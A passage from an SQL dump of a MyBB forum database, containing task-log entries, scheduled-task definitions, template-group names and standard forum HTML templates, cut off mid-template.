VALUES('16056', '9', '1352649602', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16057', '3', '1352649914', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16058', '1', '1352649945', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16059', '7', '1352649950', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16060', '5', '1352649956', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16061', '9', '1352650292', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16062', '5', '1352651664', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16063', '9', '1352651917', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16064', '3', '1352652188', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16065', '9', '1352654246', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16066', '5', '1352654477', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16067', '3', '1352654485', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16068', '1', '1352654490', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16069', '7', '1352654497', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16070', '5', '1352654800', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16071', '9', '1352654908', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16072', '3', '1352655017', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16073', '9', '1352656177', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16074', '5', '1352656197', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16075', '9', '1352656932', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16076', '3', '1352656935', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16077', '1', '1352656980', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16078', '7', '1352657008', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16079', '5', '1352657174', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16080', '9', '1352657532', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16081', '5', '1352658916', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16082', '9', '1352658942', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16083', '3', '1352658947', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16084', '9', '1352659811', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16085', '5', '1352660173', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16086', '9', '1352661175', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16087', '3', '1352661205', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16088', '1', '1352661209', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16089', '7', '1352661210', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16090', '5', '1352661217', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16091', '9', '1352661859', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16092', '5', '1352661905', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16093', '9', '1352661907', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16094', '3', '1352662223', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16095', '9', '1352662808', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16096', '5', '1352663794', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16097', '9', '1352663808', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16098', '3', '1352663992', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16099', '1', '1352664019', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16100', '7', '1352664025', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16101', '5', '1352664317', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16102', '9', '1352664679', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16103', '5', '1352665592', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16104', '9', '1352665605', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16105', '3', '1352665819', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16106', '9', '1352676005', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16107', '5', '1352676199', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16108', '3', '1352676329', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16109', '1', '1352676363', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16110', '7', '1352676366', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_datacache, lthackin_joker.mybb_forums, lthackin_joker.mybb_posts, lthackin_joker.mybb_sessions, lthackin_joker.mybb_stats, lthackin_joker.mybb_tasklog, lthackin_joker.mybb_tasks, lthackin_joker.mybb_threads, lthackin_joker.mybb_threadsread, lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history, lthackin_joker.mybb_users table(s).'); INSERT INTO mybb_tasklog VALUES('16111', '5', '1352676557', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16112', '9', '1352676566', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16113', '3', '1352677843', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16114', '9', '1352677989', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16115', '5', '1352678072', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16116', '9', '1352678375', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16117', '3', '1352678648', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16118', '1', '1352678650', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16119', '2', '1352678655', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16120', '7', '1352678727', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16121', '11', '1352678820', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16122', '5', '1352678855', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16123', '9', '1352679157', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16124', '5', '1352680003', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16125', '9', '1352680120', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16126', '3', '1352682732', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16127', '9', '1352683673', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16128', '5', '1352725304', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16129', '1', '1352732462', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16130', '7', '1352732560', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16131', '3', '1352738332', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16132', '9', '1352738338', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16133', '5', '1352754039', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16134', '1', '1352754114', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16135', '7', '1352754131', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16136', '9', '1352756651', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16137', '3', '1352758115', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16138', '5', '1352758738', 'The promotions task successfully ran.'); DROP TABLE IF EXISTS mybb_tasks; CREATE TABLE mybb_tasks ( tid int(10) unsigned NOT NULL auto_increment, title varchar(120) NOT NULL, description text NOT NULL, file varchar(30) NOT NULL, minute varchar(200) NOT NULL, hour varchar(200) NOT NULL, day varchar(100) NOT NULL, month varchar(30) NOT NULL, weekday varchar(15) NOT NULL, nextrun bigint(30) NOT NULL, lastrun bigint(30) NOT NULL, enabled int(1) DEFAULT '1' NOT NULL, logging int(1) NOT NULL, locked bigint(30) NOT NULL, PRIMARY KEY (tid) ); INSERT INTO mybb_tasks VALUES('1', 'Hourly Cleanup', 'Cleans out old searches, captcha images and expires redirects', 'hourlycleanup', '0', '*', '*', '*', '*', '1352757600', '1352754114', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('2', 'Daily Cleanup', 'Cleans out old sessions and read threads', 'dailycleanup', '0', '0', '*', '*', '*', '1352764800', '1352678655', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('3', 'Half-hourly User Cleanup', 'Automatically expires bans, warnings and posting suspension and moderation times for users', 'usercleanup', '30,59', '*', '*', '*', '*', '1352759400', '1352758115', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('4', 'Weekly Backup', 'Automatically backups your MyBB tables to your backups directory.', 'backupdb', '0', '12', '*', '*', '0,1,2,3,4,5,6', '1352808000', '1352030782', '1', '1', '1352738377'); INSERT INTO mybb_tasks VALUES('5', 'Promotion System', 'Automatically runs the promotion system every 20 minutes.', 'promotions', '5,25,45', '*', '*', '*', '*', '1352759100', '1352758738', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('6', 'Thread Views', 'Automatically updates thread views every 15 minutes. This task will automatically be enabled or disabled when changing the \'Delayed Thread Views\' setting.', 'threadviews', '10,25,40,55', '*', '*', '*', '*', '1352757300', '1352756641', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('7', 'Tables Check', 'Automatically runs a table check and attempts to repair any crashed tables.', 'checktables', '0', '*', '*', '*', '*', '1352757600', '1352754131', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('8', 'Log Pruning', 'Automatically cleans up old MyBB log files (administrator, moderator, task, promotion, and mail logs)', 'logcleanup', '0', '0', '1', '*', '*', '1354320000', '1351742826', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('9', 'Mass Mail', 'Automatically sends any queued mass mailings every 15 minutes. ', 'massmail', '10,25,40,55', '*', '*', '*', '*', '1352757300', '1352756651', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('10', 'User Pruning', 'Automatically prunes users based on criteria set in the settings every day. ', 'userpruning', '*', '2', '*', '*', '*', '1342134000', '1342102209', '0', '1', '0'); INSERT INTO mybb_tasks VALUES('11', 'Delayed Moderation', 'Automatically performs delayed moderation actions every 24 hours.', 'delayedmoderation', '0', '0', '*', '*', '0,1,2,3,4,5,6', '1352764800', '1352678820', '1', '1', '0'); INSERT INTO mybb_tasks VALUES('14', 'Achivements', 'Add users to automatically medals.', 'achivements', '*', '*', '*', '*', '0,1,2,3,4,5,6', '1352757780', '1352757742', '1', '0', '0'); DROP TABLE IF EXISTS mybb_templategroups; CREATE TABLE mybb_templategroups ( gid int(10) unsigned NOT NULL auto_increment, prefix varchar(50) NOT NULL, title varchar(100) NOT NULL, PRIMARY KEY (gid) ); INSERT INTO mybb_templategroups VALUES('1', 'calendar', '<lang:group_calendar>'); INSERT INTO mybb_templategroups VALUES('2', 'editpost', '<lang:group_editpost>'); INSERT INTO mybb_templategroups VALUES('3', 'forumbit', '<lang:group_forumbit>'); INSERT INTO mybb_templategroups VALUES('4', 'forumjump', '<lang:group_forumjump>'); INSERT INTO mybb_templategroups VALUES('5', 'forumdisplay', '<lang:group_forumdisplay>'); INSERT INTO mybb_templategroups VALUES('6', 'index', '<lang:group_index>'); INSERT INTO mybb_templategroups VALUES('7', 'error', '<lang:group_error>'); INSERT INTO mybb_templategroups VALUES('8', 'memberlist', '<lang:group_memberlist>'); INSERT INTO mybb_templategroups VALUES('9', 'multipage', '<lang:group_multipage>'); INSERT INTO mybb_templategroups VALUES('10', 'private', '<lang:group_private>'); INSERT INTO mybb_templategroups VALUES('11', 'portal', '<lang:group_portal>'); INSERT INTO mybb_templategroups VALUES('12', 'postbit', '<lang:group_postbit>'); INSERT INTO mybb_templategroups VALUES('13', 'redirect', '<lang:group_redirect>'); INSERT INTO mybb_templategroups VALUES('14', 'showthread', '<lang:group_showthread>'); INSERT INTO mybb_templategroups VALUES('15', 'usercp', '<lang:group_usercp>'); INSERT INTO mybb_templategroups VALUES('16', 'online', '<lang:group_online>'); INSERT INTO mybb_templategroups VALUES('17', 'moderation', '<lang:group_moderation>'); INSERT INTO mybb_templategroups VALUES('18', 'nav', '<lang:group_nav>'); INSERT INTO mybb_templategroups VALUES('19', 'search', '<lang:group_search>'); INSERT INTO mybb_templategroups VALUES('20', 'showteam', '<lang:group_showteam>'); INSERT INTO mybb_templategroups VALUES('21', 'reputation', '<lang:group_reputation>'); INSERT INTO mybb_templategroups VALUES('22', 'newthread', '<lang:group_newthread>'); INSERT INTO mybb_templategroups VALUES('23', 'newreply', '<lang:group_newreply>'); INSERT INTO mybb_templategroups VALUES('24', 'member', '<lang:group_member>'); INSERT INTO mybb_templategroups VALUES('25', 'warnings', '<lang:group_warning>'); INSERT INTO mybb_templategroups VALUES('26', 'global', '<lang:group_global>'); INSERT INTO mybb_templategroups VALUES('27', 'header', '<lang:group_header>'); INSERT INTO mybb_templategroups VALUES('28', 'managegroup', '<lang:group_managegroup>'); INSERT INTO mybb_templategroups VALUES('29', 'misc', '<lang:group_misc>'); INSERT INTO mybb_templategroups VALUES('30', 'modcp', '<lang:group_modcp>'); INSERT INTO mybb_templategroups VALUES('31', 'php', '<lang:group_php>'); INSERT INTO mybb_templategroups VALUES('32', 'polls', '<lang:group_polls>'); INSERT INTO mybb_templategroups VALUES('33', 'post', '<lang:group_post>'); INSERT INTO mybb_templategroups VALUES('34', 'printthread', '<lang:group_printthread>'); INSERT INTO mybb_templategroups VALUES('35', 'report', '<lang:group_report>'); INSERT INTO mybb_templategroups VALUES('36', 'smilieinsert', '<lang:group_smilieinsert>'); INSERT INTO mybb_templategroups VALUES('37', 'stats', '<lang:group_stats>'); INSERT INTO mybb_templategroups VALUES('38', 'xmlhttp', '<lang:group_xmlhttp>'); INSERT INTO mybb_templategroups VALUES('39', 'footer', '<lang:group_footer>'); DROP TABLE IF EXISTS mybb_templates; CREATE TABLE mybb_templates ( tid int(10) unsigned NOT NULL auto_increment, title varchar(120) NOT NULL, template text NOT NULL, sid int(10) NOT NULL, version varchar(20) NOT NULL, status varchar(10) NOT NULL, dateline int(10) NOT NULL, PRIMARY KEY (tid) ); INSERT INTO mybb_templates VALUES('1', 'forumdisplay_threadlist', '<div class=\"float_left\">\n {$multipage}\n</div>\n<div class=\"float_right\">\n {$newthread}\n</div>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n <tr>\n <td class=\"thead\" colspan=\"{$colspan}\">\n <div style=\"float: right;\">\n <span class=\"smalltext\"><strong><a href=\"misc.php?action=markread&amp;fid={$fid}{$post_code_string}\">{$lang->markforum_read}</a> | <a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;type=forum&amp;fid={$fid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a>{$clearstoredpass}</strong></span>\n </div>\n <div>\n <strong>{$foruminfo[\'name\']}</strong>\n </div>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\" colspan=\"3\" width=\"66%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=subject&amp;order=asc\">{$lang->thread}</a> {$orderarrow[\'subject\']} / <a href=\"{$sorturl}&amp;sortby=starter&amp;order=asc\">{$lang->author}</a> {$orderarrow[\'starter\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"7%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=replies&amp;order=desc\">{$lang->replies}</a> {$orderarrow[\'replies\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"7%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=views&amp;order=desc\">{$lang->views}</a> {$orderarrow[\'views\']}</strong></span></td>\n {$ratingcol}\n <td class=\"tcat\" align=\"right\" width=\"20%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=lastpost&amp;order=desc\">{$lang->lastpost}</a> {$orderarrow[\'lastpost\']}</strong></span></td>\n {$inlinemodcol}\n </tr>\n {$selectall}\n {$announcementlist}\n {$threads}\n <tr>\n <td class=\"tfoot\" align=\"right\" colspan=\"{$colspan}\">\n <form action=\"forumdisplay.php\" method=\"get\">\n <input type=\"hidden\" name=\"selectall\" value=\"{$allselected}\" />\n <input type=\"hidden\" name=\"fid\" value=\"{$fid}\" />\n <select name=\"sortby\">\n <option value=\"subject\" {$sortsel[\'subject\']}>{$lang->sort_by_subject}</option>\n <option value=\"lastpost\" {$sortsel[\'lastpost\']}>{$lang->sort_by_lastpost}</option>\n <option value=\"starter\" {$sortsel[\'starter\']}>{$lang->sort_by_starter}</option>\n <option value=\"started\" {$sortsel[\'started\']}>{$lang->sort_by_started}</option>\n {$ratingsort}\n <option value=\"replies\" {$sortsel[\'replies\']}>{$lang->sort_by_replies}</option>\n <option value=\"views\" {$sortsel[\'views\']}>{$lang->sort_by_views}</option>\n </select>\n <select name=\"order\">\n <option value=\"asc\" {$ordersel[\'asc\']}>{$lang->sort_order_asc}</option>\n <option value=\"desc\" {$ordersel[\'desc\']}>{$lang->sort_order_desc}</option>\n </select>\n <select name=\"datecut\">\n <option value=\"1\" {$datecutsel[\'1\']}>{$lang->datelimit_1day}</option>\n <option value=\"5\" {$datecutsel[\'5\']}>{$lang->datelimit_5days}</option>\n <option value=\"10\" {$datecutsel[\'10\']}>{$lang->datelimit_10days}</option>\n <option value=\"20\" {$datecutsel[\'20\']}>{$lang->datelimit_20days}</option>\n <option value=\"50\" {$datecutsel[\'50\']}>{$lang->datelimit_50days}</option>\n <option value=\"75\" {$datecutsel[\'75\']}>{$lang->datelimit_75days}</option>\n <option value=\"100\" {$datecutsel[\'100\']}>{$lang->datelimit_100days}</option>\n <option value=\"365\" {$datecutsel[\'365\']}>{$lang->datelimit_lastyear}</option>\n <option value=\"9999\" {$datecutsel[\'9999\']}>{$lang->datelimit_beginning}</option>\n </select>\n {$gobutton}\n </form>\n </td>\n </tr>\n</table>\n<div class=\"float_left\">\n {$multipage}\n</div>\n<div class=\"float_right\" style=\"margin-top: 4px;\">\n {$newthread}\n</div>\n<br style=\"clear: both;\" />\n<br />\n<div class=\"float_left\">\n <div class=\"float_left\">\n <dl class=\"thread_legend smalltext\">\n <dd><img src=\"{$theme[\'imgdir\']}/newfolder.gif\" alt=\"{$lang->new_thread}\" title=\"{$lang->new_thread}\" /> {$lang->new_thread}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/newhotfolder.gif\" alt=\"{$lang->new_hot_thread}\" title=\"{$lang->new_hot_thread}\" /> {$lang->new_hot_thread}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/hotfolder.gif\" alt=\"{$lang->hot_thread}\" title=\"{$lang->hot_thread}\" /> {$lang->hot_thread}</dd>\n </dl>\n </div>\n\n <div class=\"float_left\">\n <dl class=\"thread_legend smalltext\">\n <dd><img src=\"{$theme[\'imgdir\']}/folder.gif\" alt=\"{$lang->no_new_thread}\" title=\"{$lang->no_new_thread}\" /> {$lang->no_new_thread}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/dot_folder.gif\" alt=\"{$lang->posts_by_you}\" title=\"{$lang->posts_by_you}\" /> {$lang->posts_by_you}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/lockfolder.gif\" alt=\"{$lang->locked_thread}\" title=\"{$lang->locked_thread}\" /> {$lang->locked_thread}</dd>\n </dl>\n </div>\n <br style=\"clear: both\" />\n</div>\n\n<div class=\"float_right\" style=\"text-align: right;\">\n {$inlinemod}\n {$searchforum}\n {$forumjump}\n</div>\n<br style=\"clear: both\" />\n{$inline_edit_js}', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('2', 'forumdisplay_threadlist_sortrating', '<option value=\"rating\" {$sortsel[\'rating\']}>{$lang->sort_by_rating}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('3', 'global_boardclosed_warning', '<div class=\"red_alert\"><strong><span style=\"color:#FF0000;\">{$lang->bbclosed_warning}</span></strong></div>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('4', 'global_pm_alert', '<div class=\"pm_alert\" id=\"pm_notice\">\n <div class=\"float_right\"><a href=\"private.php?action=dismiss_notice&amp;my_post_key={$mybb->post_code}\" title=\"{$lang->dismiss_notice}\" onclick=\"return MyBB.dismissPMNotice()\"><img src=\"{$theme[\'imgdir\']}/dismiss_notice.gif\" alt=\"{$lang->dismiss_notice}\" title=\"[x]\" /></a></div>\n <div>{$privatemessage_text}</div>\n</div>\n<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('5', 'post_savedraftbutton', '&nbsp;<input type=\"submit\" class=\"button\" name=\"savedraft\" value=\"{$lang->save_draft}\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('6', 'index', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n lang.no_new_posts = \"{$lang->no_new_posts}\";\n lang.click_mark_read = \"{$lang->click_mark_read}\";\n// -->\n</script>\n</head>\n<body>\n{$header}\n{$forums}\n{$boardstats}\n\n<dl class=\"forum_legend smalltext\">\n <dt><img src=\"{$theme[\'imgdir\']}/on.gif\" alt=\"{$lang->new_posts}\" title=\"{$lang->new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt>\n <dd>{$lang->new_posts}</dd>\n\n <dt><img src=\"{$theme[\'imgdir\']}/off.gif\" alt=\"{$lang->no_new_posts}\" title=\"{$lang->no_new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt>\n <dd>{$lang->no_new_posts}</dd>\n\n <dt><img src=\"{$theme[\'imgdir\']}/offlock.gif\" alt=\"{$lang->forum_locked}\" title=\"{$lang->forum_locked}\" style=\"vertical-align: middle;\" /></dt>\n <dd>{$lang->forum_locked}</dd>\n</dl>\n<br style=\"clear: both\" />\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('7', 'modcp_reports_allreports', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->all_reported_posts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$modcp_nav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"6\"><strong>{$lang->all_reported_posts_note}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->post_id}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->poster}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reporter}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->report_reason}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->report_time}</strong></span></td>\n</tr>\n{$allreports}\n{$allreportspages}\n</table>\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('8', 'modcp_modlogs', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->modlogs}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <form action=\"modcp.php?action=modlogs\" method=\"post\">\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->modlogs}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->action}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->information}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->ip}</strong></span></td>\n </tr>\n {$results}\n {$resultspages}\n </table>\n <br />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->filter_modlogs}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->forum}</strong></td>\n <td class=\"trow1\" width=\"75%\">\n {$forum_select}\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->from_moderator}</strong></td>\n <td class=\"trow1\" width=\"75%\">\n <select name=\"uid\">\n <option value=\"\">{$lang->all_moderators}</option>\n <option value=\"\">----------</option>\n {$user_options}\n </select>\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->sort_by}</strong></td>\n <td class=\"trow1\" width=\"75%\">\n <select name=\"sortby\">\n <option value=\"dateline\"{$sortbysel[\'dateline\']}>{$lang->date}</option>\n <option value=\"username\"{$sortbysel[\'username\']}>{$lang->username}</option>\n <option value=\"forum\"{$sortbysel[\'forum\']}>{$lang->forum_name}</option>\n <option value=\"thread\"{$sortbysel[\'thread\']}>{$lang->thread_subject}</option>\n </select>\n {$lang->in}\n <select name=\"order\">\n <option value=\"asc\"{$ordersel[\'asc\']}>{$lang->asc}</option>\n <option value=\"desc\"{$ordersel[\'desc\']}>{$lang->desc}</option>\n </select>\n {$lang->order}\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->per_page}</strong></td>\n <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"perpage\" value=\"{$perpage}\" size=\"4\" /></td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"submit\" class=\"button\" value=\"{$lang->filter_logs}\" />\n </div>\n </td>\n </tr>\n </table>\n </form>\n{$footer}\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('9', 'modcp_nav', '<td width=\"{$lang->nav_width}\" valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\"><strong>{$lang->nav_menu}</strong></td>\n </tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php\" class=\"modcp_nav_item modcp_nav_home\">{$lang->mcp_nav_home}</a></td></tr>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpforums\']}.gif\" id=\"modcpforums_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_forums}</strong></span></div>\n </td>\n </tr>\n <tbody style=\"{$collapsed[\'modcpforums_e\']}\" id=\"modcpforums_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=announcements\" class=\"modcp_nav_item modcp_nav_announcements\">{$lang->mcp_nav_announcements}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modqueue\" class=\"modcp_nav_item modcp_nav_modqueue\">{$lang->mcp_nav_modqueue}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=reports\" class=\"modcp_nav_item modcp_nav_reports\">{$lang->mcp_nav_reported_posts}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modlogs\" class=\"modcp_nav_item 